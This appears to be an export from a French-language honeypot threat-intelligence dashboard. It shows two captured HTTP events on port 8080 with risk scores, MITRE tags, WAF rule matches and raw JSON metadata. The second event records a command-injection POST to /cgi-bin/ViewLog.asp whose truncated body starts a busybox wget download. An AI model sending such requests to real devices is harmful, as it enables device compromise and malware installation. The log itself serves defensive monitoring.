Méthode
—
Port
8080
Chemin / cible
—
Pourquoi cette classification : Type « web_probe » (signaux protocolaires) · confiance 74%
Confiance classification
74%
Risque capteur
Moyen
· 40
Confiance : Confiance 74 % — Score WAF 8
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Meta JSON brut
{
"protocol_emulated": true,
"emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a206e67696e782f312e32342e300d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b",
"emulator_response_len": 81,
"port_inferred_service": true,
"bytes_in": 0,
"payload_entropy": 0,
"port_category": "registered",
"org": "Shenzhen Tencent Computer Systems Company Limited",
"service": "http",
"app_proto": "http",
"asn": 45090,
"country": "CN",
"dst_port": 8080,
"risk_waf": 8,
"risk_classification": 38,
"risk_behavior": 0,
"risk_geo": 0,
"risk_protocol": 33,
"risk_novelty": 0,
"risk_boost": 0,
"risk_granularity": 4.2,
"risk_breakdown": {
"waf": 8,
"classification": 38,
"behavior": 0,
"geo": 0,
"protocol": 33,
"novelty": 0
},
"risk_score": 40,
"tag_count": 3,
"anomaly_count": 0,
"campaign_key": "986800c5ad65e75d541a277e48953dacf3f318da",
"event_fingerprint": "5afc6680f618e490dc22cb875ac6d45b5c7d65ea",
"city": null,
"is_datacenter": false,
"is_tor_hint": false,
"geo": {
"country": "CN",
"asn": 45090,
"org": "Shenzhen Tencent Computer Systems Company Limited",
"is_datacenter": false,
"is_tor_hint": false
},
"fingerprint": {
"path_pattern_hash": "4154520a4208b3f021f35a6cc1dd98ae"
},
"service_name": "http",
"target_context": {
"dst_port": 8080,
"service": "http",
"service_name": "http",
"risk_score": 40
},
"classification_reason": "Type \u00ab web_probe \u00bb (signaux protocolaires) \u00b7 confiance 74%",
"confidence_breakdown": {
"waf": 8,
"classification": 38,
"behavior": 0,
"geo": 0,
"protocol": 33,
"novelty": 0,
"risk_score": 40
},
"attack_stage": "probe",
"mitre_tactics": [
"TA0007",
"TA0001"
],
"mitre": "TA0007",
"threat_family": [
"scanner"
],
"confidence": 0.74,
"classification_confidence": 0.74,
"recommended_client_action": "monitor",
"policy_mode": "intelligence",
"sensor_role": "threat_intelligence",
"event_signature": "945d6c54aac35f31bab6fba8d81332256826a36c",
"protocol_details": {
"port": 8080,
"service": "http",
"service_label_fr": "HTTP"
},
"attack_vector": "Sonde HTTP \u00b7 via HTTP:8080 \u00b7 (sonde \/ probe)",
"target_port_label": "8080 \u00b7 HTTP",
"emulator_service": "http",
"confidence_reason": "Confiance 74 % \u2014 Score WAF 8",
"site_display": {
"classification": null,
"classification_reason": "Type \u00ab web_probe \u00bb (signaux protocolaires) \u00b7 confiance 74%",
"classification_reason_label_fr": "Type \u00ab web_probe \u00bb (signaux protocolaires) \u00b7 confiance 74%",
"executive_one_liner_fr": "Activit\u00e9 suspecte \u00b7 risque 40\/100",
"confidence_pct": 74,
"confidence_breakdown": {
"waf": 8,
"classification": 38,
"behavior": 0,
"geo": 0,
"protocol": 33,
"novelty": 0,
"risk_score": 40
},
"attack_stage": "probe",
"attack_stage_label": "Sonde \/ probe",
"attack_chain_stage": "discovery",
"attack_chain_stage_label_fr": "D\u00e9couverte",
"risk_score": 40,
"risk_label": "Moyen",
"service_name": "http",
"service_label_fr": "HTTP",
"dst_port": 8080,
"protocol_emulated": true,
"tags_summary": null,
"tags_summary_labels_fr": null,
"recommended_action": "monitor",
"recommended_action_label": "Surveiller",
"mitre": "TA0007",
"mitre_technique": "TA0007",
"persona_hostname": "mail.sensor-1.internal",
"persona_service_banner": "honeypot-http",
"correlation_flags": null,
"correlation_flags_labels_fr": null,
"sensor_role": "threat_intelligence",
"sensor_role_label_fr": "Renseignement menaces",
"confidence_hint_fr": null,
"protocol_details": {
"port": 8080,
"service": "http",
"service_label_fr": "HTTP"
},
"attack_vector": "Sonde HTTP \u00b7 via HTTP:8080 \u00b7 (sonde \/ probe)",
"evidence_snippet": null,
"target_port_label": "8080 \u00b7 HTTP",
"emulator_service": "http",
"confidence_reason": "Confiance 74 % \u2014 Score WAF 8",
"confidence_factors_fr": "Confiance 74 % \u2014 Score WAF 8",
"campaign_hint_fr": null,
"attack_phases_timeline_fr": [
{
"key": "recon",
"label_fr": "Reconnaissance",
"active": false,
"kind": "stage"
},
{
"key": "probe",
"label_fr": "Sonde \/ probe",
"active": true,
"kind": "stage"
},
{
"key": "exploit_attempt",
"label_fr": "Tentative d'exploit",
"active": false,
"kind": "stage"
},
{
"key": "post_exploit",
"label_fr": "Post-exploitation",
"active": false,
"kind": "stage"
},
{
"key": "c2",
"label_fr": "Commande & contr\u00f4le",
"active": false,
"kind": "stage"
},
{
"key": "discovery",
"label_fr": "D\u00e9couverte",
"active": true,
"kind": "chain",
"hint_fr": null
}
]
},
"honeypot_persona": {
"sensor_id": "sensor-1",
"hostname": "mail.sensor-1.internal",
"mail_host": "mail.sensor-1.internal",
"ldap_dc": "dc.sensor-1.internal",
"k8s_cluster": "hp-sensor-1",
"domain": "sensor-1.internal",
"service_role": "http",
"service_banner": "honeypot-http",
"service_os": "linux",
"dst_port": "8080"
},
"hostname": "mail.sensor-1.internal",
"sensor_id": "sensor-1",
"attack_chain_stage": "discovery",
"matched_patterns": [],
"ban_policy": "advisory_monitor",
"tags_list": [
"http_alt_8080",
"http_alt_port",
"net_web_probe"
]
}
|
Méthode
POST
Port
8080
Chemin / cible
/cgi-bin/ViewLog.asp
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0145
pat-0146
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932200
CRS 932205
Ligne de requête
POST /cgi-bin/ViewLog.asp HTTP/1.1
User-Agent
python-requests/2.20.0
Règles WAF
lfi-12
lfi-14
rce-0
ssrf-3
nosqli-3
host-header-ip
scanner-ua
Payload (extrait)
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
Requête brute (extrait)
POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded /bin/busybox wget h
Meta JSON brut
{
"protocol_emulated": true,
"emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a206e67696e782f312e32342e300d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b",
"emulator_response_len": 81,
"http_header_count": 7,
"http_query_params": 0,
"http_path_depth": 2,
"http_path_ext": "asp",
"http_ua_hash": "5ed188ee8f03b9b5045027e66f2c2d0c76cd81f8",
"http_host_hash": "79e23ad24947820f69162b6226d8b315fdff11b2",
"http_target_hash": "8b93ef7edfc6b90a5376dfb13a37fc0083fd0b34",
"http_referer_hash": null,
"http_method": "POST",
"http_ua_is_cli": true,
"http_ua_is_browser": false,
"bytes_in": 314,
"payload_entropy": 5.309333452792499,
"port_category": "registered",
"org": "Shenzhen Tencent Computer Systems Company Limited",
"service": "http",
"app_proto": "http",
"asn": 45090,
"country": "CN",
"dst_port": 8080,
"risk_waf": 100,
"risk_classification": 85,
"risk_behavior": 0,
"risk_geo": 0,
"risk_protocol": 43,
"risk_novelty": 30,
"risk_boost": 15,
"risk_granularity": 6.2,
"risk_breakdown": {
"waf": 100,
"classification": 85,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 30
},
"risk_score": 81,
"tag_count": 18,
"anomaly_count": 1,
"campaign_key": "fb3f12ae21814fa6e806b29e629b2526045075b5",
"event_fingerprint": "83c29cfe482471ddc328515854f4001515d74202",
"classification_reason": "Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%",
"confidence": 1,
"classification_confidence": 1,
"precision_score": 212,
"precision_signals": [
"INT-http_cmdi",
"pat-0145",
"pat-0146"
],
"kb_rule_ids": [
"INT-http_cmdi",
"pat-0145",
"pat-0146"
],
"matched_patterns": [
"pat-0842",
"pat-0145",
"pat-0146"
],
"matched_pattern_names": [
"CRS 921130 duplicate CL",
"CRS 932200",
"CRS 932205"
],
"pattern_ids": [
"pat-0842",
"pat-0145",
"pat-0146"
],
"confidence_breakdown": {
"waf": 100,
"classification": 85,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 30,
"risk_score": 81
},
"named_classification_skipped": false,
"service_name": "http",
"risk_confidence_factor": 100,
"city": null,
"is_datacenter": false,
"is_tor_hint": false,
"geo": {
"country": "CN",
"asn": 45090,
"org": "Shenzhen Tencent Computer Systems Company Limited",
"is_datacenter": false,
"is_tor_hint": false
},
"fingerprint": {
"http_ua_hash": "5d15eec7b3defb608f008a906ac38c19",
"payload_hash": "fa2c7ef23cdb7a6c4c9200fd4e771a15",
"path_pattern_hash": "7f8c672897f040df549e064dab87e8bf"
},
"target_context": {
"dst_port": 8080,
"service": "http",
"service_name": "http",
"risk_score": 81
},
"payload_preview": "POST \/cgi-bin\/ViewLog.asp HTTP\/1.1\r\nHost: 192.168.0.14:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: *\/*\r\n",
"method": "POST",
"path": "\/cgi-bin\/ViewLog.asp",
"user_agent": "python-requests\/2.20.0",
"waf_tags": [
"950311:lfi-12",
"950319:lfi-14",
"950327:rce-0",
"950407:ssrf-3",
"950468:nosqli-3",
"950471:nosqli-3",
"950645:host-header-ip",
"scanner-ua"
],
"waf_rule_names": [
"lfi-12",
"lfi-14",
"rce-0",
"ssrf-3",
"nosqli-3",
"host-header-ip",
"scanner-ua"
],
"request_line": "POST \/cgi-bin\/ViewLog.asp HTTP\/1.1",
"request_sample": "POST \/cgi-bin\/ViewLog.asp HTTP\/1.1\r\nHost: 192.168.0.14:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: *\/*\r\nUser-Agent: python-requests\/2.20.0\r\nContent-Length: 227\r\nContent-Type: application\/x-www-form-urlencoded\r\n\r\n \/bin\/busybox wget h",
"payload_snippet": "POST \/cgi-bin\/ViewLog.asp HTTP\/1.1\r\nHost: 192.168.0.14:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: *\/*",
"evidence": {
"method": "POST",
"path": "\/cgi-bin\/ViewLog.asp",
"user_agent": "python-requests\/2.20.0",
"waf_tags": [
"950311:lfi-12",
"950319:lfi-14",
"950327:rce-0",
"950407:ssrf-3",
"950468:nosqli-3",
"950471:nosqli-3",
"950645:host-header-ip",
"scanner-ua"
],
"waf_rule_names": [
"lfi-12",
"lfi-14",
"rce-0",
"ssrf-3",
"nosqli-3",
"host-header-ip",
"scanner-ua"
],
"request_line": "POST \/cgi-bin\/ViewLog.asp HTTP\/1.1",
"request_sample": "POST \/cgi-bin\/ViewLog.asp HTTP\/1.1\r\nHost: 192.168.0.14:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: *\/*\r\nUser-Agent: python-requests\/2.20.0\r\nContent-Length: 227\r\nContent-Type: application\/x-www-form-urlencoded\r\n\r\n \/bin\/busybox wget h",
"payload_snippet": "POST \/cgi-bin\/ViewLog.asp HTTP\/1.1\r\nHost: 192.168.0.14:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: *\/*",
"classification_reason": "Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%"
},
"attack_stage": "exploit_attempt",
"mitre_tactics": [
"TA0001",
"TA0002"
],
"mitre_techniques": [
"T1059",
"T1190"
],
"mitre": "T1059",
"threat_family": [
"rce_probe",
"ssrf_probe"
],
"recommended_client_action": "investigate",
"policy_mode": "intelligence",
"sensor_role": "threat_intelligence",
"event_signature": "dca76940d00f63b7051b405a3d2008de4b15d85d",
"protocol_details": {
"http_method": "POST",
"http_path": "\/cgi-bin\/ViewLog.asp",
"request_line": "POST \/cgi-bin\/ViewLog.asp HTTP\/1.1",
"http_user_agent": "python-requests\/2.20.0",
"port": 8080,
"service": "http",
"service_label_fr": "HTTP"
},
"evidence_snippet": "POST \/cgi-bin\/ViewLog.asp HTTP\/1.1\r\nHost: 192.168.0.14:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: *\/*",
"attack_vector": "cmd injection \u00b7 via HTTP:8080 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/cgi-bin\/ViewLog.asp",
"target_port_label": "8080 \u00b7 HTTP",
"emulator_service": "http",
"confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9",
"site_display": {
"classification": null,
"classification_reason": "Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%",
"classification_reason_label_fr": "Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%",
"executive_one_liner_fr": "Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP",
"confidence_pct": 100,
"confidence_breakdown": {
"waf": 100,
"classification": 85,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 30,
"risk_score": 81
},
"attack_stage": "exploit_attempt",
"attack_stage_label": "Tentative d'exploit",
"attack_chain_stage": "exploitation",
"attack_chain_stage_label_fr": "Exploitation",
"risk_score": 81,
"risk_label": "\u00c9lev\u00e9",
"service_name": "http",
"service_label_fr": "HTTP",
"dst_port": 8080,
"protocol_emulated": true,
"tags_summary": [
"INT-http_cmdi",
"pat-0145",
"pat-0146"
],
"tags_summary_labels_fr": [
"Http Cmdi",
"pat-0145",
"pat-0146"
],
"recommended_action": "investigate",
"recommended_action_label": "Investiguer",
"mitre": "T1059",
"mitre_technique": "T1059",
"persona_hostname": "mail.sensor-1.internal",
"persona_service_banner": "honeypot-http",
"correlation_flags": null,
"correlation_flags_labels_fr": null,
"sensor_role": "threat_intelligence",
"sensor_role_label_fr": "Renseignement menaces",
"confidence_hint_fr": null,
"protocol_details": {
"http_method": "POST",
"http_path": "\/cgi-bin\/ViewLog.asp",
"request_line": "POST \/cgi-bin\/ViewLog.asp HTTP\/1.1",
"http_user_agent": "python-requests\/2.20.0",
"port": 8080,
"service": "http",
"service_label_fr": "HTTP"
},
"attack_vector": "cmd injection \u00b7 via HTTP:8080 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/cgi-bin\/ViewLog.asp",
"evidence_snippet": "POST \/cgi-bin\/ViewLog.asp HTTP\/1.1\r\nHost: 192.168.0.14:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: *\/*",
"target_port_label": "8080 \u00b7 HTTP",
"emulator_service": "http",
"confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9",
"confidence_factors_fr": "Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF",
"campaign_hint_fr": null,
"attack_phases_timeline_fr": [
{
"key": "recon",
"label_fr": "Reconnaissance",
"active": false,
"kind": "stage"
},
{
"key": "probe",
"label_fr": "Sonde \/ probe",
"active": false,
"kind": "stage"
},
{
"key": "exploit_attempt",
"label_fr": "Tentative d'exploit",
"active": true,
"kind": "stage"
},
{
"key": "post_exploit",
"label_fr": "Post-exploitation",
"active": false,
"kind": "stage"
},
{
"key": "c2",
"label_fr": "Commande & contr\u00f4le",
"active": false,
"kind": "stage"
},
{
"key": "exploitation",
"label_fr": "Exploitation",
"active": true,
"kind": "chain",
"hint_fr": null
}
]
},
"honeypot_persona": {
"sensor_id": "sensor-1",
"hostname": "mail.sensor-1.internal",
"mail_host": "mail.sensor-1.internal",
"ldap_dc": "dc.sensor-1.internal",
"k8s_cluster": "hp-sensor-1",
"domain": "sensor-1.internal",
"service_role": "http",
"service_banner": "honeypot-http",
"service_os": "linux",
"dst_port": "8080"
},
"hostname": "mail.sensor-1.internal",
"sensor_id": "sensor-1",
"attack_chain_stage": "exploitation",
"ban_policy": "advisory_investigate",
"tags_list": [
"950311:lfi-12",
"950319:lfi-14",
"950327:rce-0",
"950407:ssrf-3",
"950468:nosqli-3",
"950471:nosqli-3",
"950645:host-header-ip",
"anomaly:scanner-ua",
"http_cmd_injection",
"http_host_header_injection",
"http_jwt_body",
"http_probe_cgi_bin",
"http_sensitive_path",
"http_ssrf_body",
"http_ua_suspicious",
"iot_http_endpoint",
"net_web_probe",
"scanner-ua"
]
}
|